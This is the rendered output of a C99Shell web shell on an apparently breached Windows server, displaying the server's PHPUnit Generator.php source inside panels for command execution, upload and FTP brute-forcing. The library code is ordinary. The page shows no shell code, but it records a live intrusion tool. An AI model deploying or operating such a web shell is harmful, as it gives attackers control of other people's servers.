!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\php\pear\PHPUnit\Framework\MockObject\   drwxrwxrwx
Free 784.9 MB of 239.26 GB (0.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Generator.php (26.29 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * PHPUnit
 *
 * Copyright (c) 2010-2013, Sebastian Bergmann <sb@sebastian-bergmann.de>.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 *   * Redistributions of source code must retain the above copyright
 *     notice, this list of conditions and the following disclaimer.
 *
 *   * Redistributions in binary form must reproduce the above copyright
 *     notice, this list of conditions and the following disclaimer in
 *     the documentation and/or other materials provided with the
 *     distribution.
 *
 *   * Neither the name of Sebastian Bergmann nor the names of his
 *     contributors may be used to endorse or promote products derived
 *     from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
 * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
 * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 * @package    PHPUnit_MockObject
 * @author     Sebastian Bergmann <sb@sebastian-bergmann.de>
 * @copyright  2010-2013 Sebastian Bergmann <sb@sebastian-bergmann.de>
 * @license    http://www.opensource.org/licenses/BSD-3-Clause  The BSD 3-Clause License
 * @link       http://github.com/sebastianbergmann/phpunit-mock-objects
 * @since      File available since Release 1.0.0
 */

/**
 * Mock Object Code Generator
 *
 * @package    PHPUnit_MockObject
 * @author     Sebastian Bergmann <sb@sebastian-bergmann.de>
 * @copyright  2010-2013 Sebastian Bergmann <sb@sebastian-bergmann.de>
 * @license    http://www.opensource.org/licenses/BSD-3-Clause  The BSD 3-Clause License
 * @version    Release: 1.2.3
 * @link       http://github.com/sebastianbergmann/phpunit-mock-objects
 * @since      Class available since Release 1.0.0
 */
class PHPUnit_Framework_MockObject_Generator
{
    
/**
     * @var array
     */
    
protected static $cache = array();

    
/**
     * @var array
     */
    
protected static $blacklistedMethodNames = array(
      
'__clone' => TRUE,
      
'abstract' => TRUE,
      
'and' => TRUE,
      
'array' => TRUE,
      
'as' => TRUE,
      
'break' => TRUE,
      
'case' => TRUE,
      
'catch' => TRUE,
      
'class' => TRUE,
      
'clone' => TRUE,
      
'const' => TRUE,
      
'continue' => TRUE,
      
'declare' => TRUE,
      
'default' => TRUE,
      
'die' => TRUE,
      
'do' => TRUE,
      
'echo' => TRUE,
      
'else' => TRUE,
      
'elseif' => TRUE,
      
'empty' => TRUE,
      
'enddeclare' => TRUE,
      
'endfor' => TRUE,
      
'endforeach' => TRUE,
      
'endif' => TRUE,
      
'endswitch' => TRUE,
      
'endwhile' => TRUE,
      
'eval' => TRUE,
      
'exit' => TRUE,
      
'expects' => TRUE,
      
'extends' => TRUE,
      
'final' => TRUE,
      
'for' => TRUE,
      
'foreach' => TRUE,
      
'function' => TRUE,
      
'global' => TRUE,
      
'goto' => TRUE,
      
'if' => TRUE,
      
'implements' => TRUE,
      
'include' => TRUE,
      
'include_once' => TRUE,
      
'instanceof' => TRUE,
      
'interface' => TRUE,
      
'isset' => TRUE,
      
'list' => TRUE,
      
'namespace' => TRUE,
      
'new' => TRUE,
      
'or' => TRUE,
      
'print' => TRUE,
      
'private' => TRUE,
      
'protected' => TRUE,
      
'public' => TRUE,
      
'require' => TRUE,
      
'require_once' => TRUE,
      
'return' => TRUE,
      
'static' => TRUE,
      
'staticExpects' => TRUE,
      
'switch' => TRUE,
      
'throw' => TRUE,
      
'try' => TRUE,
      
'unset' => TRUE,
      
'use' => TRUE,
      
'var' => TRUE,
      
'while' => TRUE,
      
'xor' => TRUE
    
);

    
/**
     * @var boolean
     */
    
protected static $soapLoaded NULL;

    
/**
     * Returns a mock object for the specified class.
     *
     * @param  string  $originalClassName
     * @param  array   $methods
     * @param  array   $arguments
     * @param  string  $mockClassName
     * @param  boolean $callOriginalConstructor
     * @param  boolean $callOriginalClone
     * @param  boolean $callAutoload
     * @param  boolean $cloneArguments
     * @return object
     * @throws InvalidArgumentException
     * @since  Method available since Release 1.0.0
     */
    
public static function getMock($originalClassName$methods = array(), array $arguments = array(), $mockClassName ''$callOriginalConstructor TRUE$callOriginalClone TRUE$callAutoload TRUE$cloneArguments TRUE)
    {
        if (!
is_string($originalClassName)) {
            throw 
PHPUnit_Util_InvalidArgumentHelper::factory(1'string');
        }

        if (!
is_string($mockClassName)) {
            throw 
PHPUnit_Util_InvalidArgumentHelper::factory(4'string');
        }

        if (!
is_array($methods) && !is_null($methods)) {
            throw new 
InvalidArgumentException;
        }

        if (
NULL !== $methods) {
            foreach (
$methods as $method) {
                if (!
preg_match('~[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*~'$method)) {
                    throw new 
PHPUnit_Framework_Exception(
                      
sprintf(
                        
'Cannot stub or mock method with invalid name "%s"',
                        
$method
                      
)
                    );
                }
            }
            if (
$methods != array_unique($methods)) {
                throw new 
PHPUnit_Framework_Exception(
                  
sprintf(
                    
'Cannot stub or mock using a method list that contains duplicates: "%s"',
                    
implode(', '$methods)
                  )
                );
            }
        }

        if (
$mockClassName != '' && class_exists($mockClassNameFALSE)) {
            
$reflect = new ReflectionClass($mockClassName);
            if (!
$reflect->implementsInterface("PHPUnit_Framework_MockObject_MockObject")) {
                throw new 
PHPUnit_Framework_Exception(
                  
sprintf(
                    
'Class "%s" already exists.',
                    
$mockClassName
                  
)
                );
            }
        }

        
$mock self::generate(
          
$originalClassName,
          
$methods,
          
$mockClassName,
          
$callOriginalClone,
          
$callAutoload,
          
$cloneArguments
        
);

        return 
self::getObject(
          
$mock['code'],
          
$mock['mockClassName'],
          
$originalClassName,
          
$callOriginalConstructor,
          
$callAutoload,
          
$arguments
        
);
    }

    
/**
     * @param  string $code
     * @param  string $className
     * @param  string $originalClassName
     * @param  string $callOriginalConstructor
     * @param  string $callAutoload
     * @param  array  $arguments
     * @return object
     */
    
protected static function getObject($code$className$originalClassName ''$callOriginalConstructor FALSE$callAutoload FALSE, array $arguments = array())
    {
        if (!
class_exists($classNameFALSE)) {
            eval(
$code);
        }

        if (
$callOriginalConstructor &&
            !
interface_exists($originalClassName$callAutoload)) {
            if (
count($arguments) == 0) {
                
$object = new $className;
            } else {
                
$class = new ReflectionClass($className);
                
$object $class->newInstanceArgs($arguments);
            }
        } else {
            
// Use a trick to create a new object of a class
            // without invoking its constructor.
            
$object unserialize(
              
sprintf('O:%d:"%s":0:{}'strlen($className), $className)
            );
        }

        return 
$object;
    }

    
/**
     * Returns a mock object for the specified abstract class with all abstract
     * methods of the class mocked. Concrete methods to mock can be specified with
     * the last parameter
     *
     * @param  string  $originalClassName
     * @param  array   $arguments
     * @param  string  $mockClassName
     * @param  boolean $callOriginalConstructor
     * @param  boolean $callOriginalClone
     * @param  boolean $callAutoload
     * @param  array   $mockedMethods
     * @param  boolean $cloneArguments
     * @return object
     * @since  Method available since Release 1.0.0
     * @throws InvalidArgumentException
     */
    
public static function getMockForAbstractClass($originalClassName, array $arguments = array(), $mockClassName ''$callOriginalConstructor TRUE$callOriginalClone TRUE$callAutoload TRUE$mockedMethods = array(), $cloneArguments TRUE)
    {
        if (!
is_string($originalClassName)) {
            throw 
PHPUnit_Util_InvalidArgumentHelper::factory(1'string');
        }

        if (!
is_string($mockClassName)) {
            throw 
PHPUnit_Util_InvalidArgumentHelper::factory(3'string');
        }

        if (
class_exists($originalClassName$callAutoload) ||
            
interface_exists($originalClassName$callAutoload)) {
            
$methods   = array();
            
$reflector = new ReflectionClass($originalClassName);

            foreach (
$reflector->getMethods() as $method) {
                if (
$method->isAbstract() || in_array($method->getName(), $mockedMethods)) {
                    
$methods[] = $method->getName();
                }
            }

            if (empty(
$methods)) {
                
$methods NULL;
            }

            return 
self::getMock(
              
$originalClassName,
              
$methods,
              
$arguments,
              
$mockClassName,
              
$callOriginalConstructor,
              
$callOriginalClone,
              
$callAutoload,
              
$cloneArguments
            
);
        } else {
            throw new 
PHPUnit_Framework_Exception(
              
sprintf(
                
'Class "%s" does not exist.',
                
$originalClassName
              
)
            );
        }
    }

    
/**
     * Returns an object for the specified trait.
     *
     * @param  string  $traitName
     * @param  array   $arguments
     * @param  string  $traitClassName
     * @param  boolean $callOriginalConstructor
     * @param  boolean $callOriginalClone
     * @param  boolean $callAutoload
     * @return object
     * @since  Method available since Release 1.1.0
     * @throws InvalidArgumentException
     */
    
public static function getObjectForTrait($traitName, array $arguments = array(), $traitClassName ''$callOriginalConstructor TRUE$callOriginalClone TRUE$callAutoload TRUE)
    {
        if (!
is_string($traitName)) {
            throw 
PHPUnit_Util_InvalidArgumentHelper::factory(1'string');
        }

        if (!
is_string($traitClassName)) {
            throw 
PHPUnit_Util_InvalidArgumentHelper::factory(3'string');
        }

        if (!
trait_exists($traitName$callAutoload)) {
            throw new 
PHPUnit_Framework_Exception(
              
sprintf(
                
'Trait "%s" does not exist.',
                
$traitName
              
)
            );
        }

        
$className self::generateClassName(
          
$traitName$traitClassName'Trait_'
        
);

        
$templateDir   dirname(__FILE__) . DIRECTORY_SEPARATOR 'Generator' .
                         
DIRECTORY_SEPARATOR;
        
$classTemplate = new Text_Template(
                           
$templateDir 'trait_class.tpl'
                         
);

        
$classTemplate->setVar(
          array(
            
'class_name' => $className['className'],
            
'trait_name' => $traitName
          
)
        );

        return 
self::getObject(
          
$classTemplate->render(),
          
$className['className']
        );
    }

    
/**
     * @param  string  $originalClassName
     * @param  array   $methods
     * @param  string  $mockClassName
     * @param  boolean $callOriginalClone
     * @param  boolean $callAutoload
     * @param  boolean $cloneArguments
     * @return array
     */
    
public static function generate($originalClassName, array $methods NULL$mockClassName ''$callOriginalClone TRUE$callAutoload TRUE$cloneArguments TRUE)
    {
        if (
$mockClassName == '') {
            
$key md5(
              
$originalClassName .
              
serialize($methods) .
              
serialize($callOriginalClone) .
              
serialize($cloneArguments)
            );

            if (isset(
self::$cache[$key])) {
                return 
self::$cache[$key];
            }
        }

        
$mock self::generateMock(
          
$originalClassName,
          
$methods,
          
$mockClassName,
          
$callOriginalClone,
          
$callAutoload,
          
$cloneArguments
        
);

        if (isset(
$key)) {
            
self::$cache[$key] = $mock;
        }

        return 
$mock;
    }

    
/**
     * @param  string $wsdlFile
     * @param  string $originalClassName
     * @param  array  $methods
     * @param  array  $options
     * @return array
     */
    
public static function generateClassFromWsdl($wsdlFile$originalClassName, array $methods = array(), array $options = array())
    {
        if (
self::$soapLoaded === NULL) {
            
self::$soapLoaded extension_loaded('soap');
        }

        if (
self::$soapLoaded) {
            
$client   = new SOAPClient($wsdlFile$options);
            
$_methods array_unique($client->__getFunctions());
            unset(
$client);

            
$templateDir    dirname(__FILE__) . DIRECTORY_SEPARATOR .
                              
'Generator' DIRECTORY_SEPARATOR;
            
$methodTemplate = new Text_Template(
                                
$templateDir 'wsdl_method.tpl'
                              
);
            
$methodsBuffer  '';

            foreach (
$_methods as $method) {
                
$nameStart strpos($method' ') + 1;
                
$nameEnd   strpos($method'(');
                
$name      substr($method$nameStart$nameEnd $nameStart);

                if (empty(
$methods) || in_array($name$methods)) {
                    
$args    explode(
                                 
',',
                                 
substr(
                                   
$method,
                                   
$nameEnd 1,
                                   
strpos($method')') - $nameEnd 1
                                 
)
                               );
                    
$numArgs count($args);

                    for (
$i 0$i $numArgs$i++) {
                        
$args[$i] = substr($args[$i], strpos($args[$i], '$'));
                    }

                    
$methodTemplate->setVar(
                      array(
                        
'method_name' => $name,
                        
'arguments'   => join(', '$args)
                      )
                    );

                    
$methodsBuffer .= $methodTemplate->render();
                }
            }

            
$optionsBuffer 'array(';
            foreach (
$options as $key => $value) {
                
$optionsBuffer .= $key ' => ' $value;
            }

            
$optionsBuffer .= ')';

            
$classTemplate = new Text_Template(
              
$templateDir 'wsdl_class.tpl'
            
);

            
$namespace '';
            if(
strpos($originalClassName'\\') !== FALSE) {
                
$parts explode('\\'$originalClassName);
                
$originalClassName array_pop($parts);
                
$namespace 'namespace ' join('\\'$parts) . ';';
            }

            
$classTemplate->setVar(
              array(
                
'namespace'  => $namespace,
                
'class_name' => $originalClassName,
                
'wsdl'       => $wsdlFile,
                
'options'    => $optionsBuffer,
                
'methods'    => $methodsBuffer
              
)
            );

            return 
$classTemplate->render();
        } else {
            throw new 
PHPUnit_Framework_Exception(
              
'The SOAP extension is required to generate a mock object ' .
              
'from WSDL.'
            
);
        }
    }

    
/**
     * @param  string     $originalClassName
     * @param  array|null $methods
     * @param  string     $mockClassName
     * @param  boolean    $callOriginalClone
     * @param  boolean    $callAutoload
     * @param  boolean    $cloneArguments
     * @return array
     */
    
protected static function generateMock($originalClassName$methods$mockClassName$callOriginalClone$callAutoload$cloneArguments TRUE)
    {
        
$templateDir   dirname(__FILE__) . DIRECTORY_SEPARATOR 'Generator' .
                         
DIRECTORY_SEPARATOR;
        
$classTemplate = new Text_Template(
                           
$templateDir 'mocked_class.tpl'
                         
);
        
$cloneTemplate '';
        
$isClass       FALSE;
        
$isInterface   FALSE;

        
$mockClassName self::generateClassName(
          
$originalClassName$mockClassName'Mock_'
        
);

        if (
class_exists($mockClassName['fullClassName'], $callAutoload)) {
            
$isClass TRUE;
        } else {
            if (
interface_exists($mockClassName['fullClassName'], $callAutoload)) {
                
$isInterface TRUE;
            }
        }

        if (!
class_exists($mockClassName['fullClassName'], $callAutoload) &&
            !
interface_exists($mockClassName['fullClassName'], $callAutoload)) {
            
$prologue 'class ' $mockClassName['originalClassName'] . "\n{\n}\n\n";

            if (!empty(
$mockClassName['namespaceName'])) {
                
$prologue 'namespace ' $mockClassName['namespaceName'] .
                            
" {\n\n" $prologue "}\n\n" .
                            
"namespace {\n\n";

                
$epilogue "\n\n}";
            }

            
$cloneTemplate = new Text_Template(
              
$templateDir 'mocked_clone.tpl'
            
);
        } else {
            
$class = new ReflectionClass($mockClassName['fullClassName']);

            if (
$class->isFinal()) {
                throw new 
PHPUnit_Framework_Exception(
                  
sprintf(
                    
'Class "%s" is declared "final" and cannot be mocked.',
                    
$mockClassName['fullClassName']
                  )
                );
            }

            if (
$class->hasMethod('__clone')) {
                
$cloneMethod $class->getMethod('__clone');

                if (!
$cloneMethod->isFinal()) {
                    if (
$callOriginalClone && !$isInterface) {
                        
$cloneTemplate = new Text_Template(
                          
$templateDir 'unmocked_clone.tpl'
                        
);
                    } else {
                        
$cloneTemplate = new Text_Template(
                          
$templateDir 'mocked_clone.tpl'
                        
);
                    }
                }
            } else {
                
$cloneTemplate = new Text_Template(
                  
$templateDir 'mocked_clone.tpl'
                
);
            }
        }

        if (
is_object($cloneTemplate)) {
            
$cloneTemplate $cloneTemplate->render();
        }

        if (
is_array($methods) && empty($methods) &&
            (
$isClass || $isInterface)) {
            
$methods get_class_methods($mockClassName['fullClassName']);
        }

        if (!
is_array($methods)) {
            
$methods = array();
        }

        
$mockedMethods '';

        if (isset(
$class)) {
            foreach (
$methods as $methodName) {
                try {
                    
$method $class->getMethod($methodName);

                    if (
self::canMockMethod($method)) {
                        
$mockedMethods .= self::generateMockedMethodDefinitionFromExisting(
                          
$templateDir$method$cloneArguments
                        
);
                    }
                }

                catch (
ReflectionException $e) {
                    
$mockedMethods .= self::generateMockedMethodDefinition(
                      
$templateDir$mockClassName['fullClassName'], $methodName$cloneArguments
                    
);
                }
            }
        } else {
            foreach (
$methods as $methodName) {
                
$mockedMethods .= self::generateMockedMethodDefinition(
                  
$templateDir$mockClassName['fullClassName'], $methodName$cloneArguments
                
);
            }
        }

        
$classTemplate->setVar(
          array(
            
'prologue'          => isset($prologue) ? $prologue '',
            
'epilogue'          => isset($epilogue) ? $epilogue '',
            
'class_declaration' => self::generateMockClassDeclaration(
                                     
$mockClassName$isInterface
                                   
),
            
'clone'             => $cloneTemplate,
            
'mock_class_name'   => $mockClassName['className'],
            
'mocked_methods'    => $mockedMethods
          
)
        );

        return array(
          
'code'          => $classTemplate->render(),
          
'mockClassName' => $mockClassName['className']
        );
    }

    
/**
     * @param  string $originalClassName
     * @param  string $className
     * @param  string $prefix
     * @return array
     */
    
protected static function generateClassName($originalClassName$className$prefix)
    {
        if (
$originalClassName[0] == '\\') {
            
$originalClassName substr($originalClassName1);
        }

        
$classNameParts explode('\\'$originalClassName);

        if (
count($classNameParts) > 1) {
            
$originalClassName array_pop($classNameParts);
            
$namespaceName     join('\\'$classNameParts);
            
$fullClassName     $namespaceName '\\' $originalClassName;
        } else {
            
$namespaceName '';
            
$fullClassName $originalClassName;
        }

        if (
$className == '') {
            do {
                
$className $prefix $originalClassName '_' .
                             
substr(md5(microtime()), 08);
            }
            while (
class_exists($classNameFALSE));
        }

        return array(
          
'className'         => $className,
          
'originalClassName' => $originalClassName,
          
'fullClassName'     => $fullClassName,
          
'namespaceName'     => $namespaceName
        
);
    }

    
/**
     * @param  array   $mockClassName
     * @param  boolean $isInterface
     * @return array
     */
    
protected static function generateMockClassDeclaration(array $mockClassName$isInterface)
    {
        
$buffer 'class ';

        if (
$isInterface) {
            
$buffer .= sprintf(
              
"%s implements PHPUnit_Framework_MockObject_MockObject, %s%s",
              
$mockClassName['className'],
              !empty(
$mockClassName['namespaceName']) ? $mockClassName['namespaceName'] . '\\' '',
              
$mockClassName['originalClassName']
            );
        } else {
            
$buffer .= sprintf(
              
"%s extends %s%s implements PHPUnit_Framework_MockObject_MockObject",
              
$mockClassName['className'],
              !empty(
$mockClassName['namespaceName']) ? $mockClassName['namespaceName'] . '\\' '',
              
$mockClassName['originalClassName']
            );
        }

        return 
$buffer;
    }

    
/**
     * @param  string           $templateDir
     * @param  ReflectionMethod $method
     * @param  boolean          $cloneArguments
     * @return string
     */
    
protected static function generateMockedMethodDefinitionFromExisting($templateDirReflectionMethod $method$cloneArguments TRUE)
    {
        if (
$method->isPrivate()) {
            
$modifier 'private';
        }

        else if (
$method->isProtected()) {
            
$modifier 'protected';
        }

        else {
            
$modifier 'public';
        }

        if (
$method->isStatic()) {
            
$static TRUE;
        } else {
            
$static FALSE;
        }

        if (
$method->returnsReference()) {
            
$reference '&';
        } else {
            
$reference '';
        }

        return 
self::generateMockedMethodDefinition(
          
$templateDir,
          
$method->getDeclaringClass()->getName(),
          
$method->getName(),
          
$cloneArguments,
          
$modifier,
          
PHPUnit_Util_Class::getMethodParameters($method),
          
PHPUnit_Util_Class::getMethodParameters($methodTRUE),
          
$reference,
          
$static
        
);
    }

    
/**
     * @param  string  $templateDir
     * @param  string  $className
     * @param  string  $methodName
     * @param  boolean $cloneArguments
     * @param  string  $modifier
     * @param  string  $arguments_decl
     * @param  string  $arguments_call
     * @param  string  $reference
     * @param  boolean $static
     * @return string
     */
    
protected static function generateMockedMethodDefinition($templateDir$className$methodName$cloneArguments TRUE$modifier 'public'$arguments_decl ''$arguments_call ''$reference ''$static FALSE)
    {
        if (
$static) {
            
$template = new Text_Template(
              
$templateDir 'mocked_static_method.tpl'
            
);
        } else {
            
$template = new Text_Template(
              
$templateDir 'mocked_object_method.tpl'
            
);
        }

        
$template->setVar(
          array(
            
'arguments_decl'  => $arguments_decl,
            
'arguments_call'  => $arguments_call,
            
'arguments_count' => !empty($arguments_call) ? count(explode(','$arguments_call)) : 0,
            
'class_name'      => $className,
            
'method_name'     => $methodName,
            
'modifier'        => $modifier,
            
'reference'       => $reference,
            
'clone_arguments' => $cloneArguments 'TRUE' 'FALSE'
          
)
        );

        return 
$template->render();
    }

    
/**
     * @param  ReflectionMethod $method
     * @return boolean
     */
    
protected static function canMockMethod(ReflectionMethod $method)
    {
        if (
$method->isConstructor() || $method->isFinal() ||
            isset(
self::$blacklistedMethodNames[$method->getName()])) {
            return 
FALSE;
        }

        return 
TRUE;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--